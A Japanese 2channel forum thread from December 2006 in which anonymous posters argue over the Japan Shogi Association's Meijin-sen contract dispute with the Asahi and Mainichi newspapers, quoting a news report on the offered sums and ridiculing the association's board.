誹謗中傷を繰り返しているのは一部の若者だけです。
彼らは戦争に憧れ、軍国主義に憧れているだけに過ぎません。


http://society3.2ch.net/test/read.cgi/mass/1165751720/l50


801 :名無し名人:2006/12/10(日) 23:16:13 ID:nv++ovEg
来期の順位戦が行われるためには、いつまでに契約すれば大丈夫なん?

802 :名無し名人:2006/12/10(日) 23:43:42 ID:6fbKglCU
朝日が朝日オープンを、毎日が名人戦を掲載していればいいわけだから、
2007年の名人戦が終わるまでに決着すればいいんじゃないか。
間に理事選を挟むかどうか微妙で米長があせってるんだろうけど。

大名人戦ができた場合、読売は
3位、棋聖戦=(産経新聞社)1億4650万円
より少し上まで落とす気なんだろうか。

803 :名無し名人:2006/12/10(日) 23:46:08 ID:+A3iilYL
>>802
※「その差額分名人戦によこせ」

804 :名無し名人:2006/12/11(月) 00:23:27 ID:GbbWF9xz
今までは、小毎日の名人戦契約後、大読売がそれに少し上乗せして竜王戦を契約って日程だった。
ところが共催の大名人戦となると、読売の出方がわからないと決められないから、
竜王戦の契約の後にした方がいいんでないかい。

805 :名無し名人:2006/12/11(月) 01:45:30 ID:7jpEvZ90
このタイミングでそういうこと書くってのは読売と理事会との間になんかあるの?

806 :名無し名人:2006/12/11(月) 06:43:54 ID:dGKcB/AG
>>804
毎日新聞は30年間、1番将棋に金を出したスポンサー。
金欲しさに名人戦を貶め、序列1位の竜王戦を創ったのは将棋連盟。
名人戦が元に戻った時点で王将戦を廃止しておけば
今の名人戦問題はなかった。
将棋脳の前では、好意があだとなった。

807 :名無し名人:2006/12/11(月) 09:15:50 ID:wFdpDDS9
記者が自社を「読売」と呼びながら、内部事情をぺらぺら書いちゃう辺りが、
将棋業界の幼稚ぶりを物語っているようにも思うんだが。
賞金を払ってるのはお前じゃなくて会社だし、ほんとは読者だ、なんて言いたくもなる。

日経で連載中のナベツネ自伝はおもしろい。
竜王戦の話は出るのかな。将棋の話など出ないのかな。

808 :名無し名人:2006/12/11(月) 11:14:17 ID:OdVLcuSV
>>806
これからは無いかもしれないが、名人を香落ちで教えてさしあげる王将が将棋のトップと思われるのだが。
いまの王将戦の有様はあまりにもお粗末に過ぎる。

809 :名無し名人:2006/12/11(月) 11:35:34 ID:+cdIui3s
毎日が王将戦の賞金を上げるかわりに指し込み制3番の復活を言い出してほしいなあ
指し込み成立した場合は、ちゃんと7番しるってことで

810 :名無し名人:2006/12/11(月) 12:25:29 ID:x/PROYxc
もともと市井の将棋ファンは予想していたが、よみくまのカキコによって、
名人戦特集は片側取材の不良商品であることがすでにばれた。

隠すのも嘘をつくのと同じですよ、※さん、島さん、田中さん。

でもこんなウンコ特集記事を信頼する連盟命のおっさんとかまだいるんだろうなあ・・・

811 :名無し名人:2006/12/11(月) 12:28:13 ID:8NoDH2m8
新聞の将棋欄が部数に影響する訳がない

812 :名無し名人:2006/12/11(月) 12:57:13 ID:zYVqv04k
>>807
それは将棋業界が幼稚なのではなく、よみくまに常識がないだけだから許してあげて。
他のそれなりに良い大学を出てる新聞記者は、学歴なりにまともだから誤解はしないで。

813 :名無し名人:2006/12/11(月) 13:00:10 ID:iitmYoRK
>>811
週間将棋から将棋欄取ったら売り上げ部数ゼロになるでしょ。
そこまで極端ではないが、毎日新聞の将棋欄の多さは一般紙で日本一。
影響は大きい。

814 :名無し名人:2006/12/11(月) 13:25:58 ID:8NoDH2m8
>>813
将棋の話しかないマイナー誌を大手新聞社の売り上げの例えにしてる意味がわからない
ネット配信が普及しその日のうちに順位戦の結果や棋譜が普及している現在では
将棋において新聞媒体での情報など質も量も時間も全てにおいて糞みたいなものである

815 :名無し名人:2006/12/11(月) 13:37:50 ID:Ujbed0US
>>814
ネット配信の普及率のソースってあるの?
俺の周り(特に女の子)には「ウイニイって何?」みたいなのがほとんどだぞ
大多数の人達が現状では紙媒体の方が身近に感じてるんじゃないかな

816 :名無し名人:2006/12/11(月) 13:50:07 ID:8NoDH2m8
>>815
http://www2.ttcn.ne.jp/~honkawa/6200.html

817 :名無し名人:2006/12/11(月) 14:02:34 ID:Ujbed0US
>>816
時代遅れは俺かw
まぁ将来的に紙媒体は淘汰されるかもしれないが、今はまだ新聞の方が信頼性あるような・ないような・・・



もう新聞社オワテルヨ\(^o^)/

818 :名無し名人:2006/12/11(月) 14:14:54 ID:iitmYoRK
>>814
順位戦のネット中継契約者は3000人程。
毎日新聞は300万部以上。

819 :名無し名人:2006/12/11(月) 15:53:08 ID:ljCcYjp7
将棋人口の年齢層を考えると、パソコン普及率はあまり意味無い。
解説会に来るじーさま方が普段ネットで情報集めてるとか考えられないっしょ。

820 :名無し名人:2006/12/11(月) 16:02:26 ID:8NoDH2m8
>>818
その数だけで将棋が新聞の部数に影響を及ぼさない
及ぼしても誤差の程度でしかないことがわかってしまう
今の新聞業界にとって将棋は購読者のためのコンテンツではなく
文化的事業のひとつにしかなっていない、ある意味慈善的なものである
アメリカや日本を始め世界的に新聞業界はこの後数年の間に重大な局面の変化に追われるという
ネットの爆発的な普及で新聞が殺される事はないが若者を中心に新聞離れは現実的に起こりつつある
問題なのは新聞離れによって部数の売り上げが減ることではなく新聞において最も重要な収入源である
広告収入の減少、ネット広告などの新広告が伸びで来た現代では新聞広告の価値も変わってきてしまった
収入減少の波の中で棋戦を協賛する必要性がまだ保たれるかどうか、全ての主導権は新聞社側にある

821 :名無し名人:2006/12/11(月) 16:19:34 ID:iitmYoRK
>>820
名人戦を取り合った毎日と朝日の首脳陣に言ってやれ。

822 :名無し名人:2006/12/11(月) 16:21:26 ID:+cdIui3s
30年前の騒動のとき大山が朝日に「名人戦手放したら部数落ちますよ」
なんて脅かしたが結局大したことはなかった。
いまのご時世なら押して知るべし

823 :名無し名人:2006/12/11(月) 16:41:08 ID:Ujbed0US
100部の内10部が減るのと1000万部の内10部が減るのは違うから
新聞社と将棋ファンの兼ね合いだろうね

824 :ああああああああああ:2006/12/11(月) 17:39:08 ID:7WUN1XE3
死ね

825 :名無し名人:2006/12/11(月) 17:45:39 ID:9+gmPOnf
>>822
将棋蘭と発行部数との関係に関する或る程度正確なデータって、名人戦が
朝日から毎日に移管した時の朝日の発行部数の減少なんだけど、はっきり
とした資料は無いけど今でも自称600万部を発行してるんだから、
結局そんなに影響無かったんじゃないの。


826 :名無し名人:2006/12/11(月) 17:56:24 ID:kaHTmi3w
読売本当に怒っていたんだ。これはもうダメかも

827 :名無し名人:2006/12/11(月) 18:13:04 ID:bJa3jb0Q
>>819
意味分からん?
将棋人口は10代が圧倒的に多いぞ。
爺ばっかりなのは囲碁でしょ?(競技人口の70%が60歳以上)

828 :名無し名人:2006/12/11(月) 18:23:04 ID:GFU+r0uE
とはいえ10代とか若くなるほど新聞は読まんわけで・・

829 :名無し名人:2006/12/11(月) 18:44:12 ID:9+gmPOnf
>>827
エッ!? 本当?
地方のタイトル戦の大盤解説なんかの写真見てると殆どが年配のひとだぞ。
若いひとはほんの僅か。地方でしかも平日のせいなのか?


830 :名無し名人:2006/12/11(月) 19:04:37 ID:m6+jvK33
将棋も中高年ばっかだよ
今時,将棋なんてやらんでしょ

831 :名無し名人:2006/12/11(月) 19:28:41 ID:bJa3jb0Q
>>830
将棋の競技人口→710万人
囲碁の競技人口→350万人
将棋は10代、囲碁は60代以上に人気がある。 by 2006年版レジャー白書

832 :名無し名人:2006/12/11(月) 19:59:40 ID:GFU+r0uE
24とヤフーの入場者数みると
定期的にやってるひとは5〜6千人くらいなのかな。
その内金落とす人が30パーとすると約2千人?


833 :名無し名人:2006/12/11(月) 20:09:03 ID:do+A4j9L
24もヤフーも無料だから人がいる。
金落とすユーザーが30%なんてありえない。3%でもあやしい。
ハンゲならもう少し多いかもしれないが(あそこは金の使わせかたが巧妙)。

834 :名無し名人:2006/12/11(月) 21:05:37 ID:GFU+r0uE
「週刊朝日、皇太子ご夫妻の記事巡り「おわび」掲載」
朝日ってホント糞だな。連盟と、お似合いなのかもしれんが・・


835 :名無し名人:2006/12/11(月) 21:17:29 ID:V7HRqz9U
観戦記者もつかず、新聞に棋譜が掲載されることもない将棋の対局料に
年間何億円も払っている愚を改めるのが先決。
名人戦七番勝負とA級順位戦だけだったら、まだ商品価値はあるよ。

836 :名無し名人:2006/12/11(月) 21:57:44 ID:sMG/X+aa
名人位は壮大なピラミッドの頂点に位置するから
権威があるわけで、その下のピラミッドを
取り払ってしまったら、A級も名人も権威失墜w

837 :名無し名人:2006/12/11(月) 23:28:49 ID:idAAy0yy
よみくまがあんなこと書くところをみると
読売と連盟の仲がかなりおかしくなっていて、
撤退や大幅減額も視野にいれての8億要求なのかな

838 :名無し名人:2006/12/11(月) 23:48:30 ID:h5hcydFr
>>837
読売に減額されそうだからその分を朝日・毎日に上乗せ要求なんて、
いくらなんでもそんな非常識なことは


将棋連盟ならやりそうだね。

3月の移管問題勃発以来の連盟理事の発言見ていて、
もう将棋連盟がなにやっても驚かなくなったよ。

839 :名無し名人:2006/12/11(月) 23:49:33 ID:vCemCumN
2chで何度も出てきた棋士一人につき100万円の話しだって、
もともと「この方法で赤字を埋めることは非現実的であり」と
書かれてるにも関わらず、毎日新聞はその部分を伏せて
「米長の言っていることは現実味に欠ける」なんて記事にしてたことが
分かったし、毎日の情報操作と信頼性欠如が明らかになったからなぁ
単に米長はどれぐらいの退職金が足りないのかを示したのに対し、
強引に連盟批判に結び付けようとしたのは週刊誌レベルの行為
連盟を批判しても毎日が正しいなんて思わないな

840 :名無し名人:2006/12/11(月) 23:55:40 ID:h5hcydFr
>>839
いまごろ必死になって妙な連盟擁護なんて必要ないよ。
ってか、いろいろ揉めた末に朝日・毎日の共催という結論になったのに、
なんでいまごろ毎日叩きしてんだか。

そんなにまでしてスポンサーを怒らせたいのか?

841 :名無し名人:2006/12/12(火) 00:30:54 ID:Sp+ODB4I
正直共催が決まった時は、普及協力金で1億以上使える金が増えて
赤字が解消してめでたしめでたし、連盟はうまくやった、と思ってたんだが。
それをぶち壊しかねない8億要求だから読売から減額を言われてるのかもしれない。

842 :名無し名人:2006/12/12(火) 00:41:44 ID:PLDd40Ah
毎日が正しいかどうかは別としても、連盟が正しいとは、どこをどう見ても思えないがな。


843 :名無し名人:2006/12/12(火) 01:01:49 ID:Q4x4AVYC
>>840
頭のレベルが低いよ。擁護とか叩きとかスポンサーとか怒らせるとか。
いちいち話の次元が低すぎて話しにならない。
そもそも新聞社をスポンサーと位置づけているのが馬鹿っぽいというか基地外じみているというか。
物事には多様な見方があって、どのように受け止めるかというのは人それぞれなのであって、
誰もが自分と同じレベルで考えると思い込んでいるなら、丸っきり子供だよ。
天下の大新聞社が2ちゃんの書き込み一つ一つに笑ったり怒ったりするかっての。
一人で将棋板のレベルを下げてるのはお前だろう。
もっと分をわきまえた方がいいよ。俺は親切だから優しく諭してやってるが、世間はそんな甘くないよ。

844 :名無し名人:2006/12/12(火) 01:37:56 ID:nOeFcudW
>>839
棋士1人で100万ずつなんて言わなくても全体採るの賞金1割とれば簡単なのに。
5年限定それぐらいやってみればよかったのに。
まず身を削る努力を見せないと納得しないのは国政も同じだけど

845 :名無し名人:2006/12/12(火) 02:00:15 ID:kD9aJeNB
フリクラ棋士の平均年収で300万という
恐らく毎日朝日読売のどれか一社が撤退すると
足並みを合わせたかのように他も撤退する可能性は高い
数年後棋士全体の平均年収が300万という時代が来るかもしれない

846 :名無し名人:2006/12/12(火) 03:31:59 ID:KZyiPYt8
名人戦3億7000万円、朝日・毎日が将棋連盟に回答
ttp://www.yomiuri.co.jp/national/culture/news/20061212i501.htm

両社の提示額は、名人戦契約金が1社1億7000万円の計3億4000万円で、
ほかに将棋普及協力金を朝日が2000万円、毎日が1000万円支払うという。
この契約金額は現在の毎日単独主催の3億3400万円より600万円アップするものの、
読売新聞社が主催する竜王戦の契約金3億4150万円を下回る。

847 :名無し名人:2006/12/12(火) 03:51:00 ID:yqy7+vX7
名人戦3億7000万円、朝日・毎日が将棋連盟に回答
12月12日3時12分配信 読売新聞

 将棋の名人戦を来年度に始まる予選から共催することで合意した朝日新聞社と毎日新聞社が、
日本将棋連盟に対し、契約金など年間総額3億7000万円を回答していたことが11日、分かった。
 関係者によると、両社の提示額は、名人戦契約金が1社1億7000万円の計3億4000万円で、
ほかに将棋普及協力金を朝日が2000万円、毎日が1000万円支払うという。
この契約金額は現在の毎日単独主催の3億3400万円より600万円アップするものの、
読売新聞社が主催する竜王戦の契約金3億4150万円を下回る。
 一方、連盟が10月に提示した額は、2社同額で1社当たり、名人戦契約金が2億円、
名人戦振興金が3000万円、将棋普及協力金が1億円の計6億6000万円。金額に開きがあり、
連盟側は2社の回答に反発。交渉が続いている。

最終更新:12月12日3時12分
http://headlines.yahoo.co.jp/hl?a=20061212-00000501-yom-soci


848 :名無し名人:2006/12/12(火) 03:59:41 ID:KE+tCFwb
頑張れ毎日、朝日!

849 :名無し名人:2006/12/12(火) 04:06:46 ID:trulF6gm
使途不明な巨額の普及金なんぞ払いませんよ、という感じか。

850 :名無し名人:2006/12/12(火) 04:19:20 ID:62bSTRh3
>>846
連盟の要求額などは論外で、従来の契約金からもさらに減額してくると
思ってたんだが。
さすがに朝日も毎日も大人の対応だな。
結果的に読売の顔を立てることにもなっている。

連盟は反発しているということだが、じゃあ朝日・毎日案を蹴ったら
どこに名人戦を引き受けてもらえるんていうんだ?

851 :名無し名人:2006/12/12(火) 04:25:19 ID:kD9aJeNB
基本的に商業というものは製造元、取引先、消費者の3つがあって始めて成立する
農民がお米を作って、問屋がそれを買って、消費者がそれを買い始めてお金が流れる
現在の将棋界では製造元が連盟であり、取引先が新聞社であり、消費者が我々である
構図にすると  日本将棋連盟 ⇔ 新聞社 ⇔ 将棋好きの購読者であり
新聞社が連盟にお金を払うのはそれに見合う収益が購読者から上がってくるからである
しかし現実的に現在では新聞社⇔将棋好きの購読者の関係がほぼ成り立ってない状況であり
新聞社としては文化保護のような形で連盟との繋がりを保ってきた
しかし今年になって将棋連盟はさらに金額を増やすようにとの要求を取引先につきつけた
取引先としては売れないものを長年の付き合いという誠意で取引し続けて来たが
製造元の更なる要求に、もう既にぶちきれる寸前である。いや既にもう忍耐も縁も切れてしまった。

852 :名無し名人:2006/12/12(火) 04:39:06 ID:Sp+ODB4I
朝日単独案より低く、王将戦とオープンへ言及が無い。
下手すると今までより減収では?
連盟が8億っていう「言うだけ言ってみよう」って要求したから、
新聞社側も「言うだけ言ってみよう」って可能性もあるが……

王将戦とオープンが継続されても普及協力金が無いと連盟の赤字は減りにくいし、
既に24を買収してしまったんだが

853 :名無し名人:2006/12/12(火) 04:57:14 ID:f+usTPIL
いくらなんでも連盟は高額を要求し過ぎでしょ。


854 :名無し名人:2006/12/12(火) 05:05:55 ID:62bSTRh3
>>852
24に関しては会長が「タダ同然」とか日記で書いていた。金額は不明だが、
24の買収は普及金(のとらぬ狸の皮算用)とあまり関係ないのでは?


855 :名無し名人:2006/12/12(火) 05:18:12 ID:dE5nbbZ/
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

とりあえず、普及協力金が大幅減額され、
朝日単独案にあった「臨時棋戦」への言及がまったくないのはワラタw


856 :名無し名人:2006/12/12(火) 05:42:05 ID:AirfRwj6
フリクラで300もらってんのか
保護されてんなあ

857 :名無し名人:2006/12/12(火) 05:45:24 ID:dE5nbbZ/
> また、朝日主催の朝日オープン選手権は8000万円、
> 毎日がスポーツニッポン新聞社と共催している王将戦については現状維持の7800万円と、
> いずれも連盟の要望額で継続する方向で検討していると、連盟側はみている。

これも連盟が勝手にそう判断しているだけで、何の保証もないしね。

858 :名無し名人:2006/12/12(火) 05:48:58 ID:AirfRwj6
連盟は「したたかな交渉」をしてるつもりなのか?w

859 :名無し名人:2006/12/12(火) 06:03:23 ID:+G9zIX8C
名人戦微増、オープン8000万と王将が存続、大和から1億だと、計5000万程度の増収
しかしその7割以上が賞金や対局料や経費で消える。
協力金っていう真水が3000万だと、赤字が解消されません
大リストラが必要です……

860 :名無し名人:2006/12/12(火) 06:11:03 ID:BUdl8vdT
フリクラ棋士に300払ったり、引退棋士に氷代や餅代配ってる余裕があるわけだから、
経営難って言われても説得力ないしねw

861 :名無し名人:2006/12/12(火) 06:21:33 ID:J8sI4C3t
>>860
そんな無駄金があるなら老朽化してる会館をリフォームでも
してもらいたいものだよ。


862 :名無し名人:2006/12/12(火) 07:21:29 ID:+G9zIX8C
連盟が変なことをする度に、いつか新聞社がブチ切れる、と言われてきたが……
さすがに切れる寸前なんだろうな、今

863 :名無し名人:2006/12/12(火) 07:26:48 ID:MMM3LtS/
■名人戦
 両新聞社と共催の協議中です。どのように結着がつくにせよ年内です。笑うのか泣くのか怒るのか。

年内ってあと20日ですよw

864 :名無し名人:2006/12/12(火) 09:20:14 ID:qm1NAZNl
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

読売がすっぱ抜いたという事は3社共同戦線。
共催なんて最悪手、※は竜王戦は序列1位なんて言質取られたから
名人戦の契約金が上がるはずがない。理事会オワタ。

865 :名無し名人:2006/12/12(火) 09:23:31 ID:uWtn8Wla
三社合同で10億
A〜C3まで作る
女流枠とアマ枠創設


866 :名無し名人:2006/12/12(火) 09:28:27 ID:5ZMp9G9V
将棋連盟は急遽、松坂投手の代理人であるスコット・ボラス氏に
交渉の代理人を依頼するしかないな。成功報酬は3億4000万円w

867 :名無し名人:2006/12/12(火) 10:00:59 ID:pK2xtjza

総会密室化、経営内容非開示の暗黒組織に、
使途不明の掴み金をたくさん渡すわけにいかないからね。
(しかも中原米長田中と非常識極まりない人物が理事会を構成している)

新聞社の回答は一般社会の常識に沿った妥当な線だね。

868 :名無し名人:2006/12/12(火) 10:32:53 ID:tpfngDT5
これは新聞社側で組んでるなw

869 :名無し名人:2006/12/12(火) 10:49:57 ID:AirfRwj6
やめときゃよかった・・・変に駆け引きめいたことするんじゃなかった・・・

870 :名無し名人:2006/12/12(火) 10:59:06 ID:IiUrmVN7
当然ながら、もはや名人戦主催で競合する相手がいないのを見切られているね。
釣った魚に餌をやらないのが朝日流でもあるし、理事会のやり方についていけないと
いうのは朝日の本音でもあるわけか。にしても、提示額低いね。
まあ、理事会は契約金額ではなく何十年も先の普及を見越して移管したのだから本望かなw

871 :名無し名人:2006/12/12(火) 11:08:04 ID:u/5P4hHC
わろた。どんだけ、名人戦盤外戦を面白くするつもりだwwww

※オワタwww

872 :名無し名人:2006/12/12(火) 11:08:41 ID:hifPdCNr
これなら毎日単独案を可決した方が良かったな

873 :名無し名人:2006/12/12(火) 11:26:15 ID:R39ISAFh
芸スポで記事見てふいたwww
共催だから契約金も2倍になると思ったのか?
将棋脳ってコワイな

874 :名無し名人:2006/12/12(火) 11:37:46 ID:IiUrmVN7
>>873
>契約金も2倍
それどころか、名人戦の契約金が2倍になることを根拠に
読売に竜王戦の序列1位を守りたいなら契約金増額しろと迫るつもりだったらしい。

875 :名無し名人:2006/12/12(火) 11:38:58 ID:kD9aJeNB
連盟「お金欲しいな〜」
朝日「うちならもっとお金出しますよ」
連盟「毎日さん長い間ありがとうございました」
毎日「ちょっとまてそんな話あるかい」
連盟「もう決まったことですから」
毎日「棋士総会で決めんかい」
総会「毎日案否決」
連盟「もっとお金が増えるなら朝日と毎日一緒でもいいよ」
毎日「朝日さん一緒にお願いします」
朝日「いいですよ、そのほうが安く済みますしね」
連盟「2社になったのですから合計で今の2倍頂きます」
朝日毎日「アフォか」
連盟「もう決まったことですから」



876 :名無し名人:2006/12/12(火) 11:41:11 ID:6nghS/VW
競合させるつもりが談合されてやんの
将棋連盟m9(^Д^)プギャー!!


877 :名無し名人:2006/12/12(火) 11:47:01 ID:8dhiY0jg
スポンサーを怒らせてどうする
渡辺竜王が一番常識人だった点について

878 :名無し名人:2006/12/12(火) 11:53:24 ID:3EZhKGYw
朝日派ちょっとでてこい(笑)

879 :名無し名人:2006/12/12(火) 11:55:13 ID:IiUrmVN7
名人戦以外の王将戦や朝日OPはどうなるのかな。
新聞社側に立ってリストラ策を考えたら、名人戦で将棋欄を埋めることができる以上
終了ってこともあり?そこまで行くとシャレにならん・・・

880 :名無し名人:2006/12/12(火) 11:56:51 ID:u/5P4hHC
  |l、{   j} /,,ィ//|     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  i|:!ヾ、_ノ/ u {:}//ヘ     | あ…ありのまま 今 起こった事を話すぜ!
  |リ u' }  ,ノ _,!V,ハ |     < 『おれは奴らを競合させて契約金を吊り上げようと
  fト、_{ル{,ィ'※ラ ,タ人.    |  思ったらいつのまにか談合されていた』
 ヾ|宀| {´,)⌒`/ |<ヽトiゝ   | 共催だとか単独だとか
  ヽ iLレ  u' | | ヾlトハ〉.   | そんなチャチなもんじゃあ 断じてねえ
   ハ !ニ⊇ '/:}  V:::::ヽ. │ もっと恐ろしいものの片鱗を味わったぜ…
  /:::丶'T'' /u' __ /:::::::/`ヽ \____________________

881 :名無し名人:2006/12/12(火) 12:02:53 ID:qf62k4ko
名人戦が朝日・毎日の回答額で決着し、王将戦、朝日OPが連盟の要望通りに開催されたとしよう。
(王将戦:現状維持、朝日OP:1億3480万円→8000万)

名人戦の契約金 +600万
普及協力金   +3000万
朝日OP      −5480万

よって、1880万の減収となる。

882 :名無し名人:2006/12/12(火) 12:07:58 ID:kD9aJeNB
経営の素人が経営の真似事するからこういう痛い目にあう

883 :名無し名人:2006/12/12(火) 12:10:12 ID:3EZhKGYw
要するに金得しようとしてたら
王手飛車食らったようなもんか

884 :名無し名人:2006/12/12(火) 12:13:04 ID:zX2//Adi
毎日にそのままやってもらってりゃ
良かったものをw

885 :名無し名人:2006/12/12(火) 12:13:07 ID:b/mduua3
6億6千万を両新聞社が飲めないように、この額も連盟は飲めんだろ。
まぁ、交渉で4億程度に収まるでしょ。

886 :名無し名人:2006/12/12(火) 12:17:16 ID:3EZhKGYw
両社相手にどういう駆け引きをするつもりなんだろうか

前は毎日が撤退しても朝日が引き継ぐと強気に出れたが。
これはもう嵌められてる気がするが


887 :名無し名人:2006/12/12(火) 12:18:52 ID:/87mcXHl
速報は既出? 毎日&朝日から回答きた、これ。
ttp://www.yomiuri.co.jp/national/culture/news/20061212i501.htm

888 :名無し名人:2006/12/12(火) 12:23:56 ID:zX2//Adi
おわった

889 :名無し名人:2006/12/12(火) 12:25:24 ID:xL43lc5F
妙手があるはず

890 :名無し名人:2006/12/12(火) 12:25:47 ID:KE+tCFwb
朝日は名人戦が来れば紙面が埋まるから
朝日オープンを存続させる意味がなくなるし、
一度ケンカを売られた毎日が素直に
王将戦を継続するとも思えない。
竜王戦も「序列一位」の言質さえもらえば
契約金を減額するかもしれない。
そして、「他棋戦」扱いされている
他の新聞社が一番怒り心頭に發しているだろう。


いや〜、ストーブリーグで我々を楽しませてくれて
ありがとう、将棋連盟。

891 :名無し名人:2006/12/12(火) 12:25:57 ID:4Db78fu+
ここから朝日毎日と交渉で上げようとすると今度は読売から竜王戦の引き下げ食らうんじゃないのか?

892 :名無し名人:2006/12/12(火) 12:33:01 ID:IiUrmVN7
理事会には交渉のためのカードがもうないんじゃないのか?
指しきり濃厚な気がするけど、攻めをつなぐ妙手があるのか?


893 :名無し名人:2006/12/12(火) 12:36:29 ID:zX2//Adi
最終的には全ての棋戦は名人戦に統一だな

894 :名無し名人:2006/12/12(火) 12:43:34 ID:hifPdCNr
理事会もアホだが朝日もえげつないと言うか
高額の協力金を餌に毎日単独案を葬っておいて
やおら共催を持ち出して結果的に安く買い叩くとは

895 :名無し名人:2006/12/12(火) 12:44:48 ID:ZbJf+XHO
いや笑いごとじゃないぞ
どうすんの?これ

896 :名無し名人:2006/12/12(火) 12:45:11 ID:3EZhKGYw
しかし、これを卑怯というのは違う気がする。

897 :名無し名人:2006/12/12(火) 12:46:43 ID:7DQCCupv
ニュースを見て急いできました。
連盟 ┐(´ー`)┌

898 :名無し名人:2006/12/12(火) 12:47:48 ID:dssG5fLG
今日明日の泥沼日記と駒ワリオ掲示板が楽しみ

899 :名無し名人:2006/12/12(火) 12:47:59 ID:VB//WCop
※wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

900 :名無し名人:2006/12/12(火) 12:48:52 ID:J9g0h7Yh
また、朝日主催の朝日オープン選手権は8000万円、
毎日がスポーツニッポン新聞社と共催している王将戦については現状維持の7800万円と、
いずれも連盟の要望額で継続する方向で検討していると、


「連盟側はみている」



落ちにワロタ

901 :名無し名人:2006/12/12(火) 12:50:11 ID:zGhgib11
※はアホたれだ。

902 :名無し名人:2006/12/12(火) 12:50:24 ID:pK2xtjza
つーか、各新聞社とも将棋担当だけは内心煮えくり返りながらも
表に出さずに粛々と仕事しているんだろうが、
他のセクションや経営陣なんかは連盟の非常識ぶりに完全にアンチになってるんだろうな。

しょうがないよ、連盟のやってきたことはむちゃくちゃだから。

903 :名無し名人:2006/12/12(火) 12:51:52 ID:VB//WCop
将棋世界の大本営発表特集が敗着だな

904 :名無し名人:2006/12/12(火) 12:55:34 ID:u/5P4hHC
>>894
さらにここから、

理事会が朝日に泣きついて朝日の言い値で契約

とかなったら・・・腹黒すぎるwww

905 :名無し名人:2006/12/12(火) 12:55:43 ID:KE+tCFwb
そもそも名人戦を移管しようという構想自体が無理筋

906 :名無し名人:2006/12/12(火) 12:55:47 ID:/sZfaaSz
つーか、読売を配慮してこの額になったんでしょ
将棋連盟ががたがた言ったって増額は無理だろうな

907 :名無し名人:2006/12/12(火) 12:56:54 ID:HrwqKHxj
米長の身から出た錆

昔話に出てくる欲張りじいさんの末路そのまんま

908 :名無し名人:2006/12/12(火) 13:05:12 ID:TX79JoM+
勝っても負けても
連盟にとっては意味があることだよ
棋士は何もしなくても食えるわけじゃないって認識を
多少各棋士が持ってくれればそれでいいんじゃないか
あまり新聞社側の立場ばかりに意見が偏ってくるとどうしても
新聞社は情報操作とか強いしなーとか勘ぐってしまったり


909 :名無し名人:2006/12/12(火) 13:12:14 ID:8dhiY0jg
立会人、副立会人、大盤解説、観戦記解説
リストラし放題だな
でその解説が全部へぼだから、さっぱり形勢判断ができない

棋戦担当者の乾杯の声が聞こえる希ガス

910 :名無し名人:2006/12/12(火) 13:19:57 ID:ns7xRvrQ
読売まで噛んでるな。

911 :名無し名人:2006/12/12(火) 13:23:52 ID:RHz0YSIP
>>908
将棋連盟対新聞社じゃない。
将棋連盟・新聞社・一般人(将棋ファン、新聞購読者)、の三者の立場があり、
このたびの名人戦移管問題での将棋連盟の言動は、一般人の社会常識
(信義、契約)を何度もコケにするものだったから連盟に対する批判の声が
出ている。
連盟や新聞社の人間も紛れ込んでいるかもしれないが、スレに書き込まれた
意見の大半は一般人のものと思われ。

今朝読売のニュースで出た朝日・毎日の回答額は、一般人の常識的感覚に
合致する妥当なものだと、一般人である自分は思う。

912 :名無し名人:2006/12/12(火) 13:28:01 ID:ns7xRvrQ
もう名人戦(順位戦)は囲碁の大手合い扱いでいいよな

913 :名無し名人:2006/12/12(火) 13:30:33 ID:hifPdCNr
つまり廃止ということですか?

914 :名無し名人:2006/12/12(火) 13:51:31 ID:8OUHvfmA
羽生以下の若手で新団体設立キボン
スポンサーはいくらでもいるだろ
問題は誰が音頭取るかだが・・・

915 :名無し名人:2006/12/12(火) 13:58:12 ID:J9g0h7Yh
ニュー速+にはスレ立ててもらえないのか。
芸スポ速、だけで。

916 :名無し名人:2006/12/12(火) 14:11:02 ID:zsksWGWp
金が欲しくて信義を裏切って、あげくのはてに戦略負け。
いやー、米長、あんた最低。

こんなやつが書いた人生哲学本を買って読んでたやつはかわいそうだなー。

917 :名無し名人:2006/12/12(火) 14:25:17 ID:kev8ZGnI
こんなことになるくらいなら、最初から何もしなかったほうがよかったのでは?

918 :名無し名人:2006/12/12(火) 14:32:42 ID:+G9zIX8C
8億要求が無理筋だったなあ……
共催が決まった時に素直に朝日案を折半した物を提示してれば筋が通ってた。

919 :名無し名人:2006/12/12(火) 14:38:56 ID:XnIvZdy3
斜陽業界に相応しい進行だwww

920 :名無し名人:2006/12/12(火) 14:40:43 ID:0P09gXU3
初期構想がもちろん問題なんだが、その後の形勢を損ねた一番の悪手は、
投票後の共催案ではなかろうか。
朝日単独であれば、批判はあっても連盟の財務にはプラスになった。
このままでは、評判を落として、さらに金も得られないだろw

921 :名無し名人:2006/12/12(火) 14:44:09 ID:sKRqOQph
金のことも含めて共催か単独か
決めればよかったのに
共催なら二倍になると思ってたんだろうな

922 :名無し名人:2006/12/12(火) 15:00:28 ID:4iUQ6Gzw
>>918
それが普通の感覚でしょ。
そこから、お互いバナナの叩き売りというのが常識ライン。

それから、話は変わるけど、
※の日記の中にあった法人税での追徴課税が、24000円だったという件。
いかにも、確りした経理をしているんだという印象と思わせるよネェ。
ただ、法人税には繰越欠損金という制度があって、過去の赤字を翌期以降に繰り越せる訳。
最大7年まで繰り越せる。つまり、当期黒字でも、前期以前が赤字ならその分埋めて上げるという制度。
で、その結果、追徴課税が出たということになると、
過去の繰越欠損金つまり赤字分はすべて埋め立てられた上で、飛び出しの税金が出たとも考えられる。
言い方を変えると、税務署の見解では、実は、過去赤字ではなかった、ということも考えられる。

仮に外に出てしまったお金だとしても、明らかな冗費(交際費課税)や使途が明らかでないと認められたもの
なんかがあれば、税務上否認。過去の赤字は、どんどん埋め立てられちゃうんだよね。
そんな経緯があったような気がしてならないんだわ。

あくまで、推定だよ。漏れは、傍で見てた訳じゃないんだからw
ああ、こんな推定は、ちょっと経理を経験したことのある人なら、誰でも、考えつくよ。
もし、図星の場合、※のことだから、「税務当局が秘密を漏らした」なんて言い出しかねないから、
一応、これは、念のため!

923 :名無し名人:2006/12/12(火) 15:19:14 ID:yqy7+vX7
名人戦3億7000万円、朝日・毎日が将棋連盟に回答

